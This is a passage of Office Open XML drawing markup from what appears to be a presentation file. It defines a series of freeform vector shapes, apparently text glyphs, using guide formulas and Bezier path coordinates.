                <a:gd name="T18" fmla="*/ 0 w 217"/>
                <a:gd name="T19" fmla="*/ 20 h 318"/>
                <a:gd name="T20" fmla="*/ 0 w 217"/>
                <a:gd name="T21" fmla="*/ 41 h 318"/>
                <a:gd name="T22" fmla="*/ 17 w 217"/>
                <a:gd name="T23" fmla="*/ 62 h 318"/>
                <a:gd name="T24" fmla="*/ 34 w 217"/>
                <a:gd name="T25" fmla="*/ 38 h 318"/>
                <a:gd name="T26" fmla="*/ 166 w 217"/>
                <a:gd name="T27" fmla="*/ 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318">
                  <a:moveTo>
                    <a:pt x="166" y="38"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="80" y="130"/>
                    <a:pt x="63" y="240"/>
                    <a:pt x="63" y="294"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="301"/>
                    <a:pt x="63" y="318"/>
                    <a:pt x="80" y="318"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="89" y="318"/>
                    <a:pt x="97" y="312"/>
                    <a:pt x="97" y="298"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="100" y="156"/>
                    <a:pt x="176" y="69"/>
                    <a:pt x="207" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="216" y="31"/>
                    <a:pt x="217" y="30"/>
                    <a:pt x="217" y="23"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="217" y="8"/>
                    <a:pt x="206" y="8"/>
                    <a:pt x="198" y="8"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="33" y="8"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="0"/>
                    <a:pt x="21" y="0"/>
                    <a:pt x="17" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="11"/>
                    <a:pt x="0" y="20"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="41"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="51"/>
                    <a:pt x="0" y="62"/>
                    <a:pt x="17" y="62"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="62"/>
                    <a:pt x="34" y="52"/>
                    <a:pt x="34" y="38"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="166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5" name="Freeform 207">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{33E45F94-EBE6-4080-A799-29AEA3185B63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046414" y="3268663"/>
              <a:ext cx="76200" cy="122238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3 w 197"/>
                <a:gd name="T13" fmla="*/ 30 h 307"/>
                <a:gd name="T14" fmla="*/ 175 w 197"/>
                <a:gd name="T15" fmla="*/ 52 h 307"/>
                <a:gd name="T16" fmla="*/ 197 w 197"/>
                <a:gd name="T17" fmla="*/ 30 h 307"/>
                <a:gd name="T18" fmla="*/ 149 w 197"/>
                <a:gd name="T19" fmla="*/ 0 h 307"/>
                <a:gd name="T20" fmla="*/ 70 w 197"/>
                <a:gd name="T21" fmla="*/ 66 h 307"/>
                <a:gd name="T22" fmla="*/ 70 w 197"/>
                <a:gd name="T23" fmla="*/ 92 h 307"/>
                <a:gd name="T24" fmla="*/ 21 w 197"/>
                <a:gd name="T25" fmla="*/ 92 h 307"/>
                <a:gd name="T26" fmla="*/ 0 w 197"/>
                <a:gd name="T27" fmla="*/ 108 h 307"/>
                <a:gd name="T28" fmla="*/ 20 w 197"/>
                <a:gd name="T29" fmla="*/ 123 h 307"/>
                <a:gd name="T30" fmla="*/ 70 w 197"/>
                <a:gd name="T31" fmla="*/ 123 h 307"/>
                <a:gd name="T32" fmla="*/ 70 w 197"/>
                <a:gd name="T33" fmla="*/ 277 h 307"/>
                <a:gd name="T34" fmla="*/ 20 w 197"/>
                <a:gd name="T35" fmla="*/ 277 h 307"/>
                <a:gd name="T36" fmla="*/ 0 w 197"/>
                <a:gd name="T37" fmla="*/ 292 h 307"/>
                <a:gd name="T38" fmla="*/ 20 w 197"/>
                <a:gd name="T39" fmla="*/ 307 h 307"/>
                <a:gd name="T40" fmla="*/ 155 w 197"/>
                <a:gd name="T41" fmla="*/ 307 h 307"/>
                <a:gd name="T42" fmla="*/ 176 w 197"/>
                <a:gd name="T43" fmla="*/ 292 h 307"/>
                <a:gd name="T44" fmla="*/ 155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6"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="70" y="92"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21" y="92"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="92"/>
                    <a:pt x="0" y="92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0" y="123"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70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0" y="307"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="155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6" name="Freeform 208">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0693B88E-45C7-4279-83B7-CD415C0AFA41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152776" y="3303588"/>
              <a:ext cx="76200" cy="88900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2 h 222"/>
                <a:gd name="T10" fmla="*/ 115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2 h 222"/>
                <a:gd name="T22" fmla="*/ 109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6" y="222"/>
                    <a:pt x="109" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="179" y="222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7" name="Freeform 209">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5953ABF-AA00-43E0-9866-B54BF2AF0AA2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249614" y="3270250"/>
              <a:ext cx="79375" cy="122238"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 112 w 209"/>
                <a:gd name="T1" fmla="*/ 110 h 310"/>
                <a:gd name="T2" fmla="*/ 52 w 209"/>
                <a:gd name="T3" fmla="*/ 125 h 310"/>
                <a:gd name="T4" fmla="*/ 52 w 209"/>
                <a:gd name="T5" fmla="*/ 30 h 310"/>
                <a:gd name="T6" fmla="*/ 172 w 209"/>
                <a:gd name="T7" fmla="*/ 30 h 310"/>
                <a:gd name="T8" fmla="*/ 192 w 209"/>
                <a:gd name="T9" fmla="*/ 15 h 310"/>
                <a:gd name="T10" fmla="*/ 172 w 209"/>
                <a:gd name="T11" fmla="*/ 0 h 310"/>
                <a:gd name="T12" fmla="*/ 38 w 209"/>
                <a:gd name="T13" fmla="*/ 0 h 310"/>
                <a:gd name="T14" fmla="*/ 18 w 209"/>
                <a:gd name="T15" fmla="*/ 20 h 310"/>
                <a:gd name="T16" fmla="*/ 18 w 209"/>
                <a:gd name="T17" fmla="*/ 153 h 310"/>
                <a:gd name="T18" fmla="*/ 34 w 209"/>
                <a:gd name="T19" fmla="*/ 173 h 310"/>
                <a:gd name="T20" fmla="*/ 49 w 209"/>
                <a:gd name="T21" fmla="*/ 166 h 310"/>
                <a:gd name="T22" fmla="*/ 111 w 209"/>
                <a:gd name="T23" fmla="*/ 141 h 310"/>
                <a:gd name="T24" fmla="*/ 175 w 209"/>
                <a:gd name="T25" fmla="*/ 210 h 310"/>
                <a:gd name="T26" fmla="*/ 97 w 209"/>
                <a:gd name="T27" fmla="*/ 279 h 310"/>
                <a:gd name="T28" fmla="*/ 38 w 209"/>
                <a:gd name="T29" fmla="*/ 248 h 310"/>
                <a:gd name="T30" fmla="*/ 44 w 209"/>
                <a:gd name="T31" fmla="*/ 232 h 310"/>
                <a:gd name="T32" fmla="*/ 22 w 209"/>
                <a:gd name="T33" fmla="*/ 210 h 310"/>
                <a:gd name="T34" fmla="*/ 0 w 209"/>
                <a:gd name="T35" fmla="*/ 234 h 310"/>
                <a:gd name="T36" fmla="*/ 97 w 209"/>
                <a:gd name="T37" fmla="*/ 310 h 310"/>
                <a:gd name="T38" fmla="*/ 209 w 209"/>
                <a:gd name="T39" fmla="*/ 210 h 310"/>
                <a:gd name="T40" fmla="*/ 112 w 209"/>
                <a:gd name="T41" fmla="*/ 1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112" y="110"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="94" y="110"/>
                    <a:pt x="72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2" y="150"/>
                    <a:pt x="82" y="141"/>
                    <a:pt x="111" y="141"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="152" y="141"/>
                    <a:pt x="175" y="177"/>
                    <a:pt x="175" y="210"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="250"/>
                    <a:pt x="139" y="279"/>
                    <a:pt x="97" y="279"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="83" y="279"/>
                    <a:pt x="51" y="275"/>
                    <a:pt x="38" y="248"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="40" y="246"/>
                    <a:pt x="44" y="242"/>
                    <a:pt x="44" y="232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7" y="310"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="160" y="310"/>
                    <a:pt x="209" y="265"/>
                    <a:pt x="209" y="210"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="209" y="159"/>
                    <a:pt x="171" y="110"/>
                    <a:pt x="11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" name="Freeform 210">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FB24456-BF27-4495-B46C-B3139148B489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3349626" y="3303588"/>
              <a:ext cx="90488" cy="88900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5 w 234"/>
                <a:gd name="T17" fmla="*/ 59 h 222"/>
                <a:gd name="T18" fmla="*/ 57 w 234"/>
                <a:gd name="T19" fmla="*/ 36 h 222"/>
                <a:gd name="T20" fmla="*/ 67 w 234"/>
                <a:gd name="T21" fmla="*/ 31 h 222"/>
                <a:gd name="T22" fmla="*/ 85 w 234"/>
                <a:gd name="T23" fmla="*/ 30 h 222"/>
                <a:gd name="T24" fmla="*/ 149 w 234"/>
                <a:gd name="T25" fmla="*/ 81 h 222"/>
                <a:gd name="T26" fmla="*/ 0 w 234"/>
                <a:gd name="T27" fmla="*/ 156 h 222"/>
                <a:gd name="T28" fmla="*/ 82 w 234"/>
                <a:gd name="T29" fmla="*/ 222 h 222"/>
                <a:gd name="T30" fmla="*/ 155 w 234"/>
                <a:gd name="T31" fmla="*/ 203 h 222"/>
                <a:gd name="T32" fmla="*/ 149 w 234"/>
                <a:gd name="T33" fmla="*/ 111 h 222"/>
                <a:gd name="T34" fmla="*/ 149 w 234"/>
                <a:gd name="T35" fmla="*/ 153 h 222"/>
                <a:gd name="T36" fmla="*/ 130 w 234"/>
                <a:gd name="T37" fmla="*/ 184 h 222"/>
                <a:gd name="T38" fmla="*/ 85 w 234"/>
                <a:gd name="T39" fmla="*/ 192 h 222"/>
                <a:gd name="T40" fmla="*/ 34 w 234"/>
                <a:gd name="T41" fmla="*/ 156 h 222"/>
                <a:gd name="T42" fmla="*/ 149 w 234"/>
                <a:gd name="T43" fmla="*/ 1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3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6" y="55"/>
                    <a:pt x="57" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="57" y="32"/>
                    <a:pt x="57" y="32"/>
                    <a:pt x="67" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="74" y="30"/>
                    <a:pt x="81" y="30"/>
                    <a:pt x="85" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="123" y="30"/>
                    <a:pt x="149" y="46"/>
                    <a:pt x="149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0" y="222"/>
                    <a:pt x="131" y="219"/>
                    <a:pt x="155" y="203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" name="Freeform 211">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3BE3E2B7-6950-435A-A8AC-3A5FDDEB5ABD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454401" y="3303588"/>
              <a:ext cx="74613" cy="88900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2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2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="88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2"/>
                    <a:pt x="110" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="179" y="222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" name="Freeform 212">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{551C2638-8C83-4064-A5BA-097A39987F61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3549651" y="3267075"/>
              <a:ext cx="80963" cy="125413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1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1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7"/>
                    <a:pt x="35" y="153"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="80"/>
                    <a:pt x="69" y="31"/>
                    <a:pt x="106" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="142" y="31"/>
                    <a:pt x="177" y="79"/>
                    <a:pt x="177" y="153"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="227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" name="Freeform 213">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D72F6795-8C06-4320-801C-FF93A7320453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678239" y="3365500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0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49"/>
                    <a:pt x="14" y="62"/>
                    <a:pt x="30" y="62"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49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2" name="Freeform 214">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2D9C860-304C-44CF-9B26-E86AE93A15D5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3743326" y="3270250"/>
              <a:ext cx="90488" cy="122238"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 77 w 238"/>
                <a:gd name="T1" fmla="*/ 111 h 307"/>
                <a:gd name="T2" fmla="*/ 77 w 238"/>
                <a:gd name="T3" fmla="*/ 20 h 307"/>
                <a:gd name="T4" fmla="*/ 57 w 238"/>
                <a:gd name="T5" fmla="*/ 0 h 307"/>
                <a:gd name="T6" fmla="*/ 21 w 238"/>
                <a:gd name="T7" fmla="*/ 0 h 307"/>
                <a:gd name="T8" fmla="*/ 0 w 238"/>
                <a:gd name="T9" fmla="*/ 15 h 307"/>
                <a:gd name="T10" fmla="*/ 20 w 238"/>
                <a:gd name="T11" fmla="*/ 30 h 307"/>
                <a:gd name="T12" fmla="*/ 43 w 238"/>
                <a:gd name="T13" fmla="*/ 30 h 307"/>
                <a:gd name="T14" fmla="*/ 43 w 238"/>
                <a:gd name="T15" fmla="*/ 284 h 307"/>
                <a:gd name="T16" fmla="*/ 60 w 238"/>
                <a:gd name="T17" fmla="*/ 304 h 307"/>
                <a:gd name="T18" fmla="*/ 77 w 238"/>
                <a:gd name="T19" fmla="*/ 282 h 307"/>
                <a:gd name="T20" fmla="*/ 135 w 238"/>
                <a:gd name="T21" fmla="*/ 307 h 307"/>
                <a:gd name="T22" fmla="*/ 238 w 238"/>
                <a:gd name="T23" fmla="*/ 197 h 307"/>
                <a:gd name="T24" fmla="*/ 140 w 238"/>
                <a:gd name="T25" fmla="*/ 86 h 307"/>
                <a:gd name="T26" fmla="*/ 77 w 238"/>
                <a:gd name="T27" fmla="*/ 111 h 307"/>
                <a:gd name="T28" fmla="*/ 77 w 238"/>
                <a:gd name="T29" fmla="*/ 209 h 307"/>
                <a:gd name="T30" fmla="*/ 77 w 238"/>
                <a:gd name="T31" fmla="*/ 173 h 307"/>
                <a:gd name="T32" fmla="*/ 137 w 238"/>
                <a:gd name="T33" fmla="*/ 117 h 307"/>
                <a:gd name="T34" fmla="*/ 203 w 238"/>
                <a:gd name="T35" fmla="*/ 197 h 307"/>
                <a:gd name="T36" fmla="*/ 133 w 238"/>
                <a:gd name="T37" fmla="*/ 277 h 307"/>
                <a:gd name="T38" fmla="*/ 77 w 238"/>
                <a:gd name="T39" fmla="*/ 20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7">
                  <a:moveTo>
                    <a:pt x="77" y="111"/>
                  </a:move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84"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="294"/>
                    <a:pt x="43" y="304"/>
                    <a:pt x="60" y="304"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="304"/>
                    <a:pt x="77" y="294"/>
                    <a:pt x="77" y="282"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="303"/>
                    <a:pt x="119" y="307"/>
                    <a:pt x="135" y="307"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="189" y="307"/>
                    <a:pt x="238" y="260"/>
                    <a:pt x="238" y="197"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="238" y="135"/>
                    <a:pt x="193" y="86"/>
                    <a:pt x="140" y="86"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="117" y="86"/>
                    <a:pt x="94" y="95"/>
                    <a:pt x="77" y="111"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="77" y="209"/>
                  </a:move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5" y="277"/>
                    <a:pt x="77" y="233"/>
                    <a:pt x="7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3" name="Freeform 215">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6221A978-2920-46D8-90E8-4DD7B396ACBC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3849689" y="3267075"/>
              <a:ext cx="82550" cy="125413"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 166 w 217"/>
                <a:gd name="T1" fmla="*/ 38 h 318"/>
                <a:gd name="T2" fmla="*/ 63 w 217"/>
                <a:gd name="T3" fmla="*/ 294 h 318"/>
                <a:gd name="T4" fmla="*/ 80 w 217"/>
                <a:gd name="T5" fmla="*/ 318 h 318"/>
                <a:gd name="T6" fmla="*/ 97 w 217"/>
                <a:gd name="T7" fmla="*/ 298 h 318"/>
                <a:gd name="T8" fmla="*/ 206 w 217"/>
                <a:gd name="T9" fmla="*/ 40 h 318"/>
                <a:gd name="T10" fmla="*/ 217 w 217"/>
                <a:gd name="T11" fmla="*/ 23 h 318"/>
                <a:gd name="T12" fmla="*/ 197 w 217"/>
                <a:gd name="T13" fmla="*/ 8 h 318"/>
                <a:gd name="T14" fmla="*/ 33 w 217"/>
                <a:gd name="T15" fmla="*/ 8 h 318"/>
                <a:gd name="T16" fmla="*/ 17 w 217"/>
                <a:gd name="T17" fmla="*/ 0 h 318"/>
                <a:gd name="T18" fmla="*/ 0 w 217"/>
                <a:gd name="T19" fmla="*/ 20 h 318"/>
                <a:gd name="T20" fmla="*/ 0 w 217"/>
                <a:gd name="T21" fmla="*/ 41 h 318"/>
                <a:gd name="T22" fmla="*/ 17 w 217"/>
                <a:gd name="T23" fmla="*/ 62 h 318"/>
                <a:gd name="T24" fmla="*/ 34 w 217"/>
                <a:gd name="T25" fmla="*/ 38 h 318"/>
                <a:gd name="T26" fmla="*/ 166 w 217"/>
                <a:gd name="T27" fmla="*/ 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318">
                  <a:moveTo>
                    <a:pt x="166" y="38"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="80" y="130"/>
                    <a:pt x="63" y="240"/>
                    <a:pt x="63" y="294"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="301"/>
                    <a:pt x="63" y="318"/>
                    <a:pt x="80" y="318"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="89" y="318"/>
                    <a:pt x="97" y="312"/>
                    <a:pt x="97" y="298"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="100" y="156"/>
                    <a:pt x="176" y="69"/>
                    <a:pt x="206" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="216" y="31"/>
                    <a:pt x="217" y="30"/>
                    <a:pt x="217" y="23"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="217" y="8"/>
                    <a:pt x="205" y="8"/>
                    <a:pt x="197" y="8"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="33" y="8"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="0"/>
                    <a:pt x="21" y="0"/>
                    <a:pt x="17" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="11"/>
                    <a:pt x="0" y="20"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="41"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="51"/>
                    <a:pt x="0" y="62"/>
                    <a:pt x="17" y="62"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="62"/>
                    <a:pt x="34" y="52"/>
                    <a:pt x="34" y="38"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="166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4" name="Freeform 216">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D79BEB8-1B4D-4F18-9501-38732F0BB2C9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3951289" y="3303588"/>
              <a:ext cx="79375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5" name="Freeform 217">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{997279E4-6F64-4C96-B6A3-81EE101F0F08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4043364" y="3270250"/>
              <a:ext cx="92075" cy="122238"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 77 w 237"/>
                <a:gd name="T1" fmla="*/ 111 h 307"/>
                <a:gd name="T2" fmla="*/ 77 w 237"/>
                <a:gd name="T3" fmla="*/ 20 h 307"/>
                <a:gd name="T4" fmla="*/ 57 w 237"/>
                <a:gd name="T5" fmla="*/ 0 h 307"/>
                <a:gd name="T6" fmla="*/ 20 w 237"/>
                <a:gd name="T7" fmla="*/ 0 h 307"/>
                <a:gd name="T8" fmla="*/ 0 w 237"/>
                <a:gd name="T9" fmla="*/ 15 h 307"/>
                <a:gd name="T10" fmla="*/ 20 w 237"/>
                <a:gd name="T11" fmla="*/ 30 h 307"/>
                <a:gd name="T12" fmla="*/ 42 w 237"/>
                <a:gd name="T13" fmla="*/ 30 h 307"/>
                <a:gd name="T14" fmla="*/ 42 w 237"/>
                <a:gd name="T15" fmla="*/ 284 h 307"/>
                <a:gd name="T16" fmla="*/ 60 w 237"/>
                <a:gd name="T17" fmla="*/ 304 h 307"/>
                <a:gd name="T18" fmla="*/ 77 w 237"/>
                <a:gd name="T19" fmla="*/ 282 h 307"/>
                <a:gd name="T20" fmla="*/ 135 w 237"/>
                <a:gd name="T21" fmla="*/ 307 h 307"/>
                <a:gd name="T22" fmla="*/ 237 w 237"/>
                <a:gd name="T23" fmla="*/ 197 h 307"/>
                <a:gd name="T24" fmla="*/ 140 w 237"/>
                <a:gd name="T25" fmla="*/ 86 h 307"/>
                <a:gd name="T26" fmla="*/ 77 w 237"/>
                <a:gd name="T27" fmla="*/ 111 h 307"/>
                <a:gd name="T28" fmla="*/ 77 w 237"/>
                <a:gd name="T29" fmla="*/ 209 h 307"/>
                <a:gd name="T30" fmla="*/ 77 w 237"/>
                <a:gd name="T31" fmla="*/ 173 h 307"/>
                <a:gd name="T32" fmla="*/ 137 w 237"/>
                <a:gd name="T33" fmla="*/ 117 h 307"/>
                <a:gd name="T34" fmla="*/ 203 w 237"/>
                <a:gd name="T35" fmla="*/ 197 h 307"/>
                <a:gd name="T36" fmla="*/ 133 w 237"/>
                <a:gd name="T37" fmla="*/ 277 h 307"/>
                <a:gd name="T38" fmla="*/ 77 w 237"/>
                <a:gd name="T39" fmla="*/ 20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77" y="111"/>
                  </a:move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4"/>
                    <a:pt x="60" y="304"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="304"/>
                    <a:pt x="77" y="294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7" y="260"/>
                    <a:pt x="237" y="197"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="237" y="135"/>
                    <a:pt x="193" y="86"/>
                    <a:pt x="140" y="86"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="116" y="86"/>
                    <a:pt x="94" y="95"/>
                    <a:pt x="77" y="111"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="77" y="209"/>
                  </a:move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6" name="Freeform 218">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{33B5F51B-BC14-42D0-AB2A-35CA48C980A3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4149726" y="3267075"/>
              <a:ext cx="84138" cy="125413"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 109 w 218"/>
                <a:gd name="T1" fmla="*/ 131 h 316"/>
                <a:gd name="T2" fmla="*/ 42 w 218"/>
                <a:gd name="T3" fmla="*/ 80 h 316"/>
                <a:gd name="T4" fmla="*/ 109 w 218"/>
                <a:gd name="T5" fmla="*/ 31 h 316"/>
                <a:gd name="T6" fmla="*/ 176 w 218"/>
                <a:gd name="T7" fmla="*/ 80 h 316"/>
                <a:gd name="T8" fmla="*/ 109 w 218"/>
                <a:gd name="T9" fmla="*/ 131 h 316"/>
                <a:gd name="T10" fmla="*/ 148 w 218"/>
                <a:gd name="T11" fmla="*/ 146 h 316"/>
                <a:gd name="T12" fmla="*/ 211 w 218"/>
                <a:gd name="T13" fmla="*/ 80 h 316"/>
                <a:gd name="T14" fmla="*/ 109 w 218"/>
                <a:gd name="T15" fmla="*/ 0 h 316"/>
                <a:gd name="T16" fmla="*/ 7 w 218"/>
                <a:gd name="T17" fmla="*/ 80 h 316"/>
                <a:gd name="T18" fmla="*/ 70 w 218"/>
                <a:gd name="T19" fmla="*/ 146 h 316"/>
                <a:gd name="T20" fmla="*/ 0 w 218"/>
                <a:gd name="T21" fmla="*/ 224 h 316"/>
                <a:gd name="T22" fmla="*/ 109 w 218"/>
                <a:gd name="T23" fmla="*/ 316 h 316"/>
                <a:gd name="T24" fmla="*/ 218 w 218"/>
                <a:gd name="T25" fmla="*/ 224 h 316"/>
                <a:gd name="T26" fmla="*/ 148 w 218"/>
                <a:gd name="T27" fmla="*/ 146 h 316"/>
                <a:gd name="T28" fmla="*/ 109 w 218"/>
                <a:gd name="T29" fmla="*/ 285 h 316"/>
                <a:gd name="T30" fmla="*/ 35 w 218"/>
                <a:gd name="T31" fmla="*/ 223 h 316"/>
                <a:gd name="T32" fmla="*/ 109 w 218"/>
                <a:gd name="T33" fmla="*/ 161 h 316"/>
                <a:gd name="T34" fmla="*/ 183 w 218"/>
                <a:gd name="T35" fmla="*/ 223 h 316"/>
                <a:gd name="T36" fmla="*/ 109 w 218"/>
                <a:gd name="T3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16">
                  <a:moveTo>
                    <a:pt x="109" y="131"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="73" y="131"/>
                    <a:pt x="42" y="108"/>
                    <a:pt x="42" y="80"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="42" y="55"/>
                    <a:pt x="70" y="31"/>
                    <a:pt x="109" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="148" y="31"/>
                    <a:pt x="176" y="55"/>
                    <a:pt x="176" y="80"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="176" y="109"/>
                    <a:pt x="145" y="131"/>
                    <a:pt x="109" y="131"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="148" y="146"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="188" y="133"/>
                    <a:pt x="211" y="108"/>
                    <a:pt x="211" y="80"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="211" y="39"/>
                    <a:pt x="168" y="0"/>
                    <a:pt x="109" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49" y="0"/>
                    <a:pt x="7" y="40"/>
                    <a:pt x="7" y="80"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="108"/>
                    <a:pt x="30" y="133"/>
                    <a:pt x="70" y="146"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="157"/>
                    <a:pt x="0" y="186"/>
                    <a:pt x="0" y="224"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="272"/>
                    <a:pt x="47" y="316"/>
                    <a:pt x="109" y="316"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="172" y="316"/>
                    <a:pt x="218" y="272"/>
                    <a:pt x="218" y="224"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="218" y="186"/>
                    <a:pt x="185" y="157"/>
                    <a:pt x="148" y="146"/>
                  </a:cubicBezTo>
